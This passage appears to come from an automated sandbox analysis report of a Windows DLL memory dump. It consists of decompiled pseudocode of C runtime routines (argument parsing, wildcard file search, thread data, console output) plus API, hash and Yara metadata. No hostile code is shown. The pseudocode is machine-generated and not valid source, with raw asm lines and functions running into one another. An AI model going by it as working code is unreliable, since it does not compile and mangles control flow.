								_t223 = _t223 + 1 + _t265 - _v20;
								_t214 = _v12 + 4;
								_t282 = _t282 + 1;
								_v12 = _t214;
								__eflags = _t282 - _t297;
							} while (_t282 != _t297);
							_t272 = _v16;
							_v8 = _t223;
							_t223 = 0;
							__eflags = 0;
						}
						_t298 = E6F33F7DC(_t136, _t272, _v8, 1);
						_t313 = _t312 + 0xc;
						__eflags = _t298;
						if(_t298 != 0) {
							_v12 = _t285;
							_t139 = _t298 + _v16 * 4;
							_t234 = _t139;
							_v28 = _t139;
							_t140 = _t285;
							_v16 = _t234;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t223;
								 *_a8 = _t298;
								_t299 = _t223;
								goto L25;
							} else {
								_t275 = _t298 - _t285;
								__eflags = _t275;
								_v32 = _t275;
								do {
									_t150 =  *_t140;
									_t276 = _t150;
									_v24 = _t150;
									_v20 = _t276 + 1;
									do {
										_t152 =  *_t276;
										_t276 = _t276 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t276 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6F344A43(_t234, _v28 - _t234 + _v8, _v24);
									_t313 = _t313 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										_push(_t223);
										E6F3400F7();
										asm("int3");
										_t309 = _t313;
										_push(_t234);
										_t240 = _v72;
										_t65 = _t240 + 1; // 0x1
										_t278 = _t65;
										do {
											_t159 =  *_t240;
											_t240 = _t240 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t285);
										_t287 = _a8;
										_t242 = _t240 - _t278 + 1;
										_v12 = _t242;
										__eflags = _t242 -  !_t287;
										if(_t242 <=  !_t287) {
											_push(_t223);
											_push(_t298);
											_t68 = _t287 + 1; // 0x1
											_t226 = _t68 + _t242;
											_t302 = E6F3401B7(_t242, _t226, 1);
											__eflags = _t287;
											if(_t287 == 0) {
												L40:
												_push(_v12);
												_t226 = _t226 - _t287;
												_t164 = E6F344A43(_t302 + _t287, _t226, _v0);
												_t314 = _t313 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t230 = _a12;
													_t207 = E6F341C8B(_t230);
													_v12 = _t207;
													__eflags = _t207;
													if(_t207 == 0) {
														 *( *(_t230 + 4)) = _t302;
														_t305 = 0;
														_t77 = _t230 + 4;
														 *_t77 =  *(_t230 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6F33FEFF(_t302);
														_t305 = _v12;
													}
													E6F33FEFF(0);
													_t210 = _t305;
													goto L37;
												}
											} else {
												_push(_t287);
												_t212 = E6F344A43(_t302, _t226, _a4);
												_t314 = _t313 + 0x10;
												__eflags = _t212;
												if(_t212 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6F3400F7();
													asm("int3");
													_push(_t309);
													_t310 = _t314;
													_t315 = _t314 - 0x298;
													_t166 =  *0x6f36609c; // 0xe6b94de
													_v124 = _t166 ^ _t310;
													_t245 = _v108;
													_t279 = _v104;
													_push(_t226);
													_push(0);
													_t289 = _v112;
													_v724 = _t279;
													__eflags = _t245 - _t289;
													if(_t245 != _t289) {
														while(1) {
															_t205 =  *_t245;
															__eflags = _t205 - 0x2f;
															if(_t205 == 0x2f) {
																break;
															}
															__eflags = _t205 - 0x5c;
															if(_t205 != 0x5c) {
																__eflags = _t205 - 0x3a;
																if(_t205 != 0x3a) {
																	_t245 = E6F344A90(_t289, _t245);
																	__eflags = _t245 - _t289;
																	if(_t245 != _t289) {
																		continue;
																	}
																}
															}
															break;
														}
														_t279 = _v616;
													}
													_t168 =  *_t245;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t227 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t227;
														_v672 = _t227;
														_push(_t302);
														asm("sbb eax, eax");
														_v668 = _t227;
														_v664 = _t227;
														_v644 =  ~(_t169 & 0x000000ff) & _t245 - _t289 + 0x00000001;
														_v660 = _t227;
														_v656 = _t227;
														_t175 = E6F34167A(_t245 - _t289 + 1, _t289,  &_v676, E6F341B96(_t279, __eflags));
														_t316 = _t315 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t227,  &_v608, _t227, _t227, _t227);
														_t303 = _t179;
														__eflags = _t303 - 0xffffffff;
														if(_t303 != 0xffffffff) {
															_t250 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t250;
															_v648 = _t250 >> 2;
															do {
																_v640 = _t227;
																_v636 = _t227;
																_v632 = _t227;
																_v628 = _t227;
																_v624 = _t227;
																_v620 = _t227;
																_t185 = E6F3415AB( &(_v608.cFileName),  &_v640,  &_v609, E6F341B96(_t279, __eflags));
																_t316 = _t316 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t289);
																	_push(_t188);
																	L33();
																	_t316 = _t316 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t227;
																		if(_v620 != _t227) {
																			E6F33FEFF(_v632);
																			_t188 = _v652;
																		}
																		_t227 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t256 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t256;
																	if(_t256 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t256 - 0x2e;
																		if(_t256 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t227;
																			if( *((intOrPtr*)(_t188 + 2)) == _t227) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t303);
																goto L77;
																L68:
																__eflags = _v620 - _t227;
																if(_v620 != _t227) {
																	E6F33FEFF(_v632);
																}
																__eflags = FindNextFileW(_t303,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t258 = _v648;
															_t280 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t258 - _t199;
															if(_t258 != _t199) {
																E6F33EB90(_t227, _t289, _t303, _t280 + _t258 * 4, _t199 - _t258, 4, E6F3414E1);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t227);
															_push(_t227);
															_push(_t289);
															L33();
															_t227 = _t179;
														}
														L77:
														__eflags = _v656;
														if(_v656 != 0) {
															E6F33FEFF(_v668);
														}
													} else {
														__eflags = _t245 - _t289 + 1;
														if(_t245 == _t289 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t279);
															_push(0);
															_push(0);
															_push(_t289);
															L33();
														}
													}
													__eflags = _v16 ^ _t310;
													return E6F33C65E(_v16 ^ _t310);
												} else {
													goto L40;
												}
											}
										} else {
											_t210 = 0xc;
											L37:
											return _t210;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t213 = _v12;
									_t264 = _v16;
									 *((intOrPtr*)(_v32 + _t213)) = _t264;
									_t140 = _t213 + 4;
									_t234 = _t264 + _v20;
									_v16 = _t234;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t299 = _t298 | 0xffffffff;
							_v12 = _t299;
							L25:
							E6F33FEFF(_t223);
							_pop(_t235);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t223;
							_t218 = E6F344A50(_t132,  &_v8);
							_t235 =  *_t294;
							__eflags = _t218;
							if(_t218 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t218);
								_push(_t235);
								L46();
								_t312 = _t312 + 0xc;
								_v12 = _t218;
								_t299 = _t218;
							} else {
								_t219 =  &(_v608.cAlternateFileName);
								_push(_t219);
								_push(_t223);
								_push(_t223);
								_push(_t235);
								L33();
								_t299 = _t219;
								_t312 = _t312 + 0x10;
								_v12 = _t299;
							}
							__eflags = _t299;
							if(_t299 != 0) {
								break;
							}
							_t294 =  &(_a4[1]);
							_a4 = _t294;
							_t132 =  *_t294;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t285 = _v608.cAlternateFileName;
								_t233 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t285 = _v608.cAlternateFileName;
						L26:
						_t273 = _t285;
						_v32 = _t273;
						__eflags = _v40 - _t273;
						asm("sbb ecx, ecx");
						_t237 =  !_t235 & _v40 - _t273 + 0x00000003 >> 0x00000002;
						__eflags = _t237;
						_v28 = _t237;
						if(_t237 != 0) {
							_t301 = _t237;
							do {
								E6F33FEFF( *_t285);
								_t223 = _t223 + 1;
								_t285 = _t285 + 4;
								__eflags = _t223 - _t301;
							} while (_t223 != _t301);
							_t285 = _v608.cAlternateFileName;
							_t299 = _v12;
						}
						E6F33FEFF(_t285);
						goto L31;
					}
				} else {
					_t220 = E6F3401A4(_t320);
					_t299 = 0x16;
					 *_t220 = _t299;
					E6F3400E7();
					L31:
					return _t299;
				}
				L81:
			}

APIs

_free.LIBCMT ref: 6F341833

Strings

*?, xrefs: 6F3416DC

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 834d10d10cefc13e59b5b3ede005935d13e01a0ad1254e615dddca7c9f39287c
Instruction ID: c7a9a356c1010f4f9ca6d0d04a7f09b527bf74e8d69ffc92358782bbf26be8ed
Opcode Fuzzy Hash: 834d10d10cefc13e59b5b3ede005935d13e01a0ad1254e615dddca7c9f39287c
Instruction Fuzzy Hash: 47616DB6E006199FDB15DFA9C8805EEFBF5EF48314B24826AD854F7340D731AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F3415AB, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F3415AB(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6F3427A9(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E6F3427A9(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E6F34016E(GetLastError());
									_t19 =  *((intOrPtr*)(E6F3401A4(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E6F341BF1(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6F34016E(GetLastError());
						return  *((intOrPtr*)(E6F3401A4(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E6F341BF1(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E6F341BD7(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

APIs

Part of subcall function 6F341BD7: _free.LIBCMT ref: 6F341BE5

Part of subcall function 6F3427A9: WideCharToMultiByte.KERNEL32(?,00000000,6F34084A,00000000,00000001,6F3407E3,6F343ABD,?,6F34084A,?,00000000,?,6F343834,0000FDE9,00000000,?), ref: 6F34284B

GetLastError.KERNEL32 ref: 6F341613
__dosmaperr.LIBCMT ref: 6F34161A
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6F341659
__dosmaperr.LIBCMT ref: 6F341660

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 014d9c863778687c512f5d21edde0b7339aa1be6007a6f200b83bb03d9ac79b4
Instruction ID: e6c35f6e901844dacffdfb3f4312457e6b0fb15671610f4cf57dac7106ac7660
Opcode Fuzzy Hash: 014d9c863778687c512f5d21edde0b7339aa1be6007a6f200b83bb03d9ac79b4
Instruction Fuzzy Hash: 7521D371604B05BFE712BF658D8095BB7EDEF013787048618FC6597290EB36EC208BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F34103A, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6F34103A(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x6f36619c; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3404CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E6F3401B7(_t43, 1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t51);
							if(__eflags != 0) {
								E6F340E38(_t60, _t51, 0x6f37e640);
								E6F33FEFF(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E6F3404CA(__eflags,  *0x6f36619c, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E6F3404CA(0,  *0x6f36619c, 0);
							_push(0);
							L9:
							E6F33FEFF();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E6F34048B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x6f36619c; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E6F33FE28(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x6f36619c; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E6F3404CA(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E6F3401B7(_t43, 1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t60);
								if(__eflags != 0) {
									E6F340E38(_t60, _t60, 0x6f37e640);
									E6F33FEFF(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6F3404CA(__eflags,  *0x6f36619c, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6F3404CA(__eflags,  *0x6f36619c, _t20);
								_push(_t60);
								L25:
								E6F33FEFF();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6F34048B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6f36619c; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6F33FE28(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6f36619c; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6F3404CA(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6F3401B7(_t43, 1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t54);
											if(__eflags != 0) {
												E6F340E38(_t61, _t54, 0x6f37e640);
												E6F33FEFF(0);
												goto L45;
											} else {
												_t40 = 0;
												E6F3404CA(__eflags,  *0x6f36619c, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6F3404CA(0,  *0x6f36619c, 0);
											_push(0);
											L41:
											E6F33FEFF();
											goto L36;
										}
									}
								} else {
									_t54 = E6F34048B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6f36619c; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

APIs

GetLastError.KERNEL32(?,?,?,6F343575,00000000,00000001,6F34084A,?,6F343A32,00000001,?,?,?,6F3407E3,?,00000000), ref: 6F34103F
_free.LIBCMT ref: 6F34109C
_free.LIBCMT ref: 6F3410D2
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F343A32,00000001,?,?,?,6F3407E3,?,00000000,00000000,6F365098,0000002C,6F34084A), ref: 6F3410DD

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 73874c36e0395c1a59a3f8d1103c85792ac1f6796533285cd7736c6eb3904e33
Instruction ID: dc9bea37333c43837c3db220c4495c6ec39d33d69cdbac7572e829787a6fb5f3
Opcode Fuzzy Hash: 73874c36e0395c1a59a3f8d1103c85792ac1f6796533285cd7736c6eb3904e33
Instruction Fuzzy Hash: 7811E977318F806ADB1237798C80D6B21ED9BE33BD7210329F2688A2D1DF2798358560

Uniqueness

Uniqueness Score: -1.00%

Function 6F341191, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6F341191(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				void* _t14;
				signed int _t18;
				long _t21;

				_t14 = __ecx;
				_t21 = GetLastError();
				_t2 =  *0x6f36619c; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F3404CA(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6F3401B7(_t14, 1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6F3404CA(__eflags,  *0x6f36619c, _t18);
							if(__eflags != 0) {
								E6F340E38(_t21, _t18, 0x6f37e640);
								E6F33FEFF(0);
								goto L13;
							} else {
								_t13 = 0;
								E6F3404CA(__eflags,  *0x6f36619c, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6F3404CA(0,  *0x6f36619c, 0);
							_push(0);
							L9:
							E6F33FEFF();
							goto L4;
						}
					}
				} else {
					_t18 = E6F34048B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6f36619c; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

APIs

GetLastError.KERNEL32(-00000017,6F37E844,00000000,6F3401A9,6F33FEF4,6F37E824,?,6F33C421,0000BC00,6F37E844,00000000), ref: 6F341196
_free.LIBCMT ref: 6F3411F3
_free.LIBCMT ref: 6F341229
SetLastError.KERNEL32(00000000,00000006,000000FF,?,6F33C421,0000BC00,6F37E844,00000000), ref: 6F341234

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8f7fd26375860d2418002de1e1e82d85f8870fde1c4cb320cd37b0bed7f18779
Instruction ID: a17c7fae8275d0727cc78a489d50913bb53839b2ab34d2c0d18cab425eec0b9e
Opcode Fuzzy Hash: 8f7fd26375860d2418002de1e1e82d85f8870fde1c4cb320cd37b0bed7f18779
Instruction Fuzzy Hash: 5B11DB76309F002AD70277789C80E5B26EE9BE37BD7211328F669DA6C1DF22DC314960

Uniqueness

Uniqueness Score: -1.00%

Function 6F345292, Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F345292(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6f3668f0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6F34527B();
					E6F34523D();
					_t13 = WriteConsoleW( *0x6f3668f0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6f3452af
0x6f3452b3
0x6f3452c0
0x6f3452c5
0x6f3452e0
0x6f3452e0
0x6f3452e6

APIs

WriteConsoleW.KERNEL32(?,?,6F34084A,00000000,?,?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001), ref: 6F3452A9
GetLastError.KERNEL32(?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001,00000000,00000001,?,6F343A56,6F3407E3), ref: 6F3452B5

Part of subcall function 6F34527B: CloseHandle.KERNEL32(FFFFFFFE,6F3452C5,?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001,00000000,00000001), ref: 6F34528B

___initconout.LIBCMT ref: 6F3452C5

Part of subcall function 6F34523D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F34526C,6F344E04,00000001,?,6F343502,00000000,00000000,00000001,00000000), ref: 6F345250

WriteConsoleW.KERNEL32(?,?,6F34084A,00000000,?,6F344E17,?,00000001,?,00000001,?,6F343502,00000000,00000000,00000001,00000000), ref: 6F3452DA

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 1863e3691fe079da9055e0278611491f4394da96e3d9d81381f91b3ca3e672d0
Instruction ID: 5de67caad7177a75c3da58593677ec1828ec2ec4d96a96bb65797f428c8264d1
Opcode Fuzzy Hash: 1863e3691fe079da9055e0278611491f4394da96e3d9d81381f91b3ca3e672d0
Instruction Fuzzy Hash: 63F03036444615BBCF523FA5CC08A8D3FAEFF0A3F0B144419FA1989160DB3288309BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F33F52B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E6F33F52B(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				void* _t59;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						_push(_t59);
						E6F3423D2(_t48, _t59);
						E6F341E1F(_t57, 0, 0x6f37e218, 0x104);
						_t26 =  *0x6f37e7c0; // 0x34d3538
						 *0x6f37e7b0 = 0x6f37e218;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6f37e218;
							_v20 = 0x6f37e218;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6F33F7DC(E6F33F663( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6F33F663( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6F341D12(_t48, 0, _t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6f37e7b4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6f37e7b8 = _t58;
											L18:
											E6F33FEFF(_t37);
											_v12 = 0;
											L19:
											E6F33FEFF(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6f37e7b4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6f37e7b8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6F3401A4(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
